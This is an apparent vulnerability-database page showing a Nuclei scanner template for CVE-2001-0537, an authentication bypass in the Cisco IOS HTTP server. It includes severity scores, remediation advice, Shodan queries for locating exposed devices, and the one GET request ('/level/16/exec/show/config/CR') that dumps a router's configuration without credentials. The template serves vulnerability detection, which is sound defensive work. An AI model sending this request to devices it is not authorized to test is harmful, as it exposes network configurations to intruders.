Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2001-0537
HistoryJun 12, 2023 - 12:36 p.m.

Cisco IOS HTTP Configuration - Authentication Bypass

2023-06-1212:36:50
ProjectDiscovery
github.com
13
cisco
ios
authentication
bypass
vulnerability
patch
upgrade
unauthorized access

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

6.8 Medium

AI Score

Confidence

Low

0.877 High

EPSS

Percentile

98.7%

HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
id: CVE-2001-0537

info:
  name: Cisco IOS HTTP Configuration - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.
  remediation: |
    Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.
  reference:
    - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2001-0537
    - http://www.ciac.org/ciac/bulletins/l-106.shtml
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
    cvss-score: 9.3
    cve-id: CVE-2001-0537
    cwe-id: CWE-287
    epss-score: 0.87683
    epss-percentile: 0.98644
    cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: ios
    shodan-query:
      - product:"Cisco IOS http config" && 200
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve,cve2001,cisco,ios,auth-bypass

http:
  - method: GET
    path:
      - '{{BaseURL}}/level/16/exec/show/config/CR'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'service config'
          - 'Switch'
          - 'default-gateway'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022030dfd1dffb93aef87571c322ecdfc9aeef785a992efb1fbe3b847f1a23a4808602207ddca1c1fdfb4241fe6d05f8d1a531931450f32a8663883bd70541df6a93575f:922c64590222798bb761d5b6d8e72950

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

6.8 Medium

AI Score

Confidence

Low

0.877 High

EPSS

Percentile

98.7%